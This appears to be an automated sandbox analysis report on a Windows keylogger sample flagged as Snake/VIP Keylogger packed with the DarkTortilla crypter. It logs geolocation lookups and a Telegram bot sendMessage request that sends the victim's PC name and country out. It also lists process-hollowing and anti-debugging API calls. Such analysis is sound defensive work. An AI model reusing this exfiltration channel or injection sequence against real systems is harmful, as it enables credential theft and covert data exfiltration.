                                                                                                            2025-01-11 05:14:39 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.1049990104.21.112.14438132C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-11 05:14:40 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2025-01-11 05:14:40 UTC857INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:14:40 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1887269
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oH9b8y8xQIchCB37GEIPSbB3XZPxLZgTFTePJRj%2FbwtB7snI6xH0Q4LimNG9Yh1iePE6l6H%2B0RFpF9t6b%2FyvXvrBwSKtBBylM83elhJ813a3i051qUKm8eFl0m%2BTXVESQofTpM2o"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 90026cb35f41c34f-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1465&min_rtt=1455&rtt_var=565&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1902280&cwnd=181&unsent_bytes=0&cid=90bfd3be5b5b522c&ts=158&x=0"
                                                                                                            2025-01-11 05:14:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.1049992104.21.112.14438132C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-11 05:14:41 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2025-01-11 05:14:41 UTC869INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:14:41 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1887270
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=691vwRps8VJ%2FMKDTwLAlzwNvQOMLNCN0fDiDIC2Tas6PvLcEe%2B2L3%2FxiOlqUdklb0%2FKlrkvZkPhUcCewE8%2Bv%2BVtW%2Bog%2FxCY%2FzPvgG0neugbYrEJPV4aK0w1bh%2FCk1KsS0w81ehPU"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 90026cbb1cb943b3-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1550&min_rtt=1546&rtt_var=588&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1846932&cwnd=203&unsent_bytes=0&cid=3a245d01de89929d&ts=151&x=0"
                                                                                                            2025-01-11 05:14:41 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.1049994104.21.112.14438132C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-11 05:14:42 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-11 05:14:43 UTC859INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:14:42 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1887272
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wixOWX76u1OCwPc2c4KhplT6WqC2y2tW%2Bn3PAnVhcq6LaJl2zxYtWoqsRIVjA7mthzOUXW%2BgSnmB3TgQWledTnfqiLXUltw9H4%2FxEbjY4IdOEzU4UNuUhUJ24O7%2Bl83Y93%2BQhLVF"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 90026cc2a803729f-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2026&min_rtt=1972&rtt_var=778&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1480730&cwnd=169&unsent_bytes=0&cid=57aecedb33f5629f&ts=147&x=0"
                                                                                                            2025-01-11 05:14:43 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.1049996104.21.112.14438132C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-11 05:14:44 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2025-01-11 05:14:44 UTC863INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:14:44 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1887273
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YBNCaO8y5rkQ%2B2O7uav2VKJC1LRw01ULfJzp6RmyOtpVlLTFW%2FrsCv3j06Pvkgo5tBhEFE1yhFCy%2FOtQAlnZgHXxRWZ5NoDf02SuffrrBg%2BCYWcU%2F%2FuTP7CD1pE%2BZWozlgPmNwpx"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 90026cca7f70c34f-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1480&min_rtt=1475&rtt_var=563&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1926121&cwnd=181&unsent_bytes=0&cid=170eb98fa1a658d3&ts=150&x=0"
                                                                                                            2025-01-11 05:14:44 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.1049997149.154.167.2204438132C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-11 05:14:44 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2011/01/2025%20/%2010:40:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                            Host: api.telegram.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-11 05:14:45 UTC344INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Sat, 11 Jan 2025 05:14:45 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 55
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-11 05:14:45 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                            Click to jump to process

                                                                                                            Click to jump to process

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Click to jump to process

                                                                                                            Target ID:0
                                                                                                            Start time:00:13:24
                                                                                                            Start date:11/01/2025
                                                                                                            Path:C:\Users\user\Desktop\5qJ6QQTcRS.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\5qJ6QQTcRS.exe"
                                                                                                            Imagebase:0xd00000
                                                                                                            File size:838'144 bytes
                                                                                                            MD5 hash:78668D52E5B092184A4B8E6788713B3C
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1971799166.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1965003803.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:4
                                                                                                            Start time:00:13:59
                                                                                                            Start date:11/01/2025
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                            Imagebase:0x530000
                                                                                                            File size:42'064 bytes
                                                                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2545353858.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:18.6%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:4.4%
                                                                                                              Total number of Nodes:271
                                                                                                              Total number of Limit Nodes:15
                                                                                                              execution_graph 78120 769f7e8 78121 769f830 WriteProcessMemory 78120->78121 78123 769f887 78121->78123 78139 769c2c8 78141 769c2dc 78139->78141 78140 769c355 78141->78140 78149 7915374 78141->78149 78153 7914873 78141->78153 78157 7914a25 78141->78157 78161 791531f 78141->78161 78165 7914b8a 78141->78165 78169 79162af 78141->78169 78173 7915505 78141->78173 78177 79167d0 78149->78177 78180 79167c8 78149->78180 78150 79153b2 78155 79167d0 VirtualProtect 78153->78155 78156 79167c8 VirtualProtect 78153->78156 78154 7914884 78155->78154 78156->78154 78159 79167d0 VirtualProtect 78157->78159 78160 79167c8 VirtualProtect 78157->78160 78158 7914a49 78159->78158 78160->78158 78163 79167d0 VirtualProtect 78161->78163 78164 79167c8 VirtualProtect 78161->78164 78162 7915333 78163->78162 78164->78162 78167 79167d0 VirtualProtect 78165->78167 78168 79167c8 VirtualProtect 78165->78168 78166 7914b9b 78167->78166 78168->78166 78171 79167d0 VirtualProtect 78169->78171 78172 79167c8 VirtualProtect 78169->78172 78170 79162c0 78171->78170 78172->78170 78175 79167d0 VirtualProtect 78173->78175 78176 79167c8 VirtualProtect 78173->78176 78174 791551f 78175->78174 78176->78174 78178 7916818 VirtualProtect 78177->78178 78179 7916852 78178->78179 78179->78150 78181 79167d0 VirtualProtect 78180->78181 78183 7916852 78181->78183 78183->78150 78184 769fd48 78185 769fd51 78184->78185 78186 769fced VirtualProtectEx 78185->78186 78188 769fd53 78185->78188 78187 769fd0e 78186->78187 78362 769f4a8 78363 769f4e8 VirtualAllocEx 78362->78363 78365 769f525 78363->78365 78189 6129130 78190 6129152 78189->78190 78193 4fe7d80 78189->78193 78199 4fe22d0 78189->78199 78194 4fe7dbb 78193->78194 78196 4fe8043 78194->78196 78205 4fea680 78194->78205 78195 4fe8081 78195->78190 78196->78195 78209 4fec76b 78196->78209 78200 4fe22db 78199->78200 78202 4fe8043 78200->78202 78204 4fea680 GetModuleHandleW 78200->78204 78201 4fe8081 78201->78190 78202->78201 78203 4fec76b 3 API calls 78202->78203 78203->78201 78204->78202 78215 4fea6b8 78205->78215 78218 4fea6ab 78205->78218 78206 4fea696 78206->78196 78211 4fec799 78209->78211 78210 4fec7bd 78210->78195 78211->78210 78227 4fec917 78211->78227 78231 4fec8e5 78211->78231 78236 4fec928 78211->78236 78222 4fea7b0 78215->78222 78216 4fea6c7 78216->78206 78219 4fea6b8 78218->78219 78221 4fea7b0 GetModuleHandleW 78219->78221 78220 4fea6c7 78220->78206 78221->78220 78223 4fea7c1 78222->78223 78224 4fea7e4 78222->78224 78223->78224 78225 4fea9e8 GetModuleHandleW 78223->78225 78224->78216 78226 4feaa15 78225->78226 78226->78216 78228 4fec91b 78227->78228 78230 4fec96f 78228->78230 78240 4feb4b0 78228->78240 78230->78210 78232 4fec8f2 78231->78232 78233 4fec91b 78231->78233 78232->78210 78234 4fec96f 78233->78234 78235 4feb4b0 3 API calls 78233->78235 78234->78210 78235->78234 78237 4fec935 78236->78237 78238 4fec96f 78237->78238 78239 4feb4b0 3 API calls 78237->78239 78238->78210 78239->78238 78241 4feb4bb 78240->78241 78243 4fed688 78241->78243 78244 4feccb4 78241->78244 78245 4feccbf 78244->78245 78246 4fe22d0 3 API calls 78245->78246 78247 4fed6f7 78246->78247 78248 4fed731 78247->78248 78251 4fef440 78247->78251 78256 4fef450 78247->78256 78248->78243 78252 4fef450 78251->78252 78253 4fef48d 78252->78253 78262 61209c0 78252->78262 78267 61209b0 78252->78267 78253->78248 78258 4fef481 78256->78258 78259 4fef582 78256->78259 78257 4fef48d 78257->78248 78258->78257 78260 61209b0 2 API calls 78258->78260 78261 61209c0 2 API calls 78258->78261 78259->78248 78260->78259 78261->78259 78263 61209eb 78262->78263 78264 6120a9a 78263->78264 78272 6121890 78263->78272 78277 61218a0 78263->78277 78268 61209eb 78267->78268 78269 6120a9a 78268->78269 78270 6121890 2 API calls 78268->78270 78271 61218a0 2 API calls 78268->78271 78270->78269 78271->78269 78273 61218a0 78272->78273 78281 61218f0 78273->78281 78285 61218e4 78273->78285 78279 61218f0 CreateWindowExW 78277->78279 78280 61218e4 CreateWindowExW 78277->78280 78278 61218d5 78278->78264 78279->78278 78280->78278 78282 6121958 CreateWindowExW 78281->78282 78284 6121a14 78282->78284 78286 61218f0 CreateWindowExW 78285->78286 78288 6121a14 78286->78288 78366 4fe1abc 78367 4fe1a7a 78366->78367 78368 4fe1a82 OutputDebugStringW 78367->78368 78370 4fe1ad2 78367->78370 78369 4fe1a9f 78368->78369 78371 7f51530 78373 4fe22d0 3 API calls 78371->78373 78374 4fe7d80 3 API calls 78371->78374 78372 7f51543 78373->78372 78374->78372 78124 4fe01f8 78125 4fe023c CheckRemoteDebuggerPresent 78124->78125 78126 4fe027e 78125->78126 78289 4fe3456 78290 4fe3466 78289->78290 78291 4fe4607 78290->78291 78293 7574e58 78290->78293 78294 7574e8a 78293->78294 78297 757bea8 78294->78297 78295 757a624 78295->78291 78298 757bed2 78297->78298 78301 757c120 78298->78301 78299 757bf7a 78299->78295 78302 757c141 78301->78302 78305 757c588 78302->78305 78306 757c59d 78305->78306 78309 75737ac 78306->78309 78310 757c8b0 DeleteFileW 78309->78310 78312 757c4b7 78310->78312 78312->78299 78127 769d360 78128 769d3a8 VirtualProtect 78127->78128 78129 769d3e2 78128->78129 78313 7918b38 78314 7918b7b 78313->78314 78315 7918fa9 78314->78315 78317 791b048 78314->78317 78318 791b056 78317->78318 78319 791b05d 78317->78319 78318->78314 78319->78318 78321 791dca0 78319->78321 78322 791dd1f CreateProcessAsUserW 78321->78322 78324 791de20 78322->78324 78130 757feda 78131 757fe7d 78130->78131 78132 757fe82 ResumeThread 78131->78132 78134 757fee3 78131->78134 78133 757fea9 78132->78133 78375 7f53eb8 78378 7f522b0 78375->78378 78377 7f53ed7 78379 7f522bb 78378->78379 78381 4fe22d0 3 API calls 78379->78381 78382 4fe7d80 3 API calls 78379->78382 78380 7f53f5c 78380->78377 78381->78380 78382->78380 78135 4fefe70 78136 4fefeb5 Wow64SetThreadContext 78135->78136 78138 4fefefd 78136->78138 78447 af0040 78448 af01cb 78447->78448 78449 af0066 78447->78449 78449->78448 78453 af02c0 PostMessageW 78449->78453 78455 af0350 78449->78455 78460 af02ba 78449->78460 78454 af032c 78453->78454 78454->78449 78456 af02f5 78455->78456 78457 af030d PostMessageW 78456->78457 78459 af035b 78456->78459 78458 af032c 78457->78458 78458->78449 78459->78449 78461 af02c1 PostMessageW 78460->78461 78462 af032c 78461->78462 78462->78449 78325 791f9a0 78326 791f9e5 Wow64GetThreadContext 78325->78326 78328 791fa2d 78326->78328 78329 4fe24c8 78330 4fe24ed 78329->78330 78333 4fe2180 78330->78333 78332 4fe24fe 78334 4fe218b 78333->78334 78337 4fe2270 78334->78337 78336 4fe4d65 78336->78332 78338 4fe227b 78337->78338 78341 4fe22a0 78338->78341 78340 4fe4e42 78340->78336 78342 4fe22ab 78341->78342 78343 4fe22d0 3 API calls 78342->78343 78344 4fe4f54 78343->78344 78344->78340 78383 cbd01c 78384 cbd034 78383->78384 78385 cbd08e 78384->78385 78390 6122808 78384->78390 78396 6121aa8 78384->78396 78401 61227f9 78384->78401 78407 6121a97 78384->78407 78391 6122835 78390->78391 78392 6122867 78391->78392 78412 6122990 78391->78412 78417 6122980 78391->78417 78422 6122a5c 78391->78422 78397 6121ace 78396->78397 78398 6122808 2 API calls 78397->78398 78399 61227f9 2 API calls 78397->78399 78400 6121aef 78397->78400 78398->78400 78399->78400 78400->78385 78402 6122867 78401->78402 78403 6122802 78401->78403 78402->78402 78403->78402 78404 6122990 2 API calls 78403->78404 78405 6122980 2 API calls 78403->78405 78406 6122a5c 2 API calls 78403->78406 78404->78402 78405->78402 78406->78402 78408 6121aa8 78407->78408 78409 6121aef 78408->78409 78410 6122808 2 API calls 78408->78410 78411 61227f9 2 API calls 78408->78411 78409->78385 78410->78409 78411->78409 78414 61229a4 78412->78414 78413 6122a30 78413->78392 78428 6122a48 78414->78428 78431 6122a3b 78414->78431 78419 61229a4 78417->78419 78418 6122a30 78418->78392 78420 6122a3b 2 API calls 78419->78420 78421 6122a48 2 API calls 78419->78421 78420->78418 78421->78418 78423 6122a1a 78422->78423 78424 6122a6a 78422->78424 78426 6122a3b 2 API calls 78423->78426 78427 6122a48 2 API calls 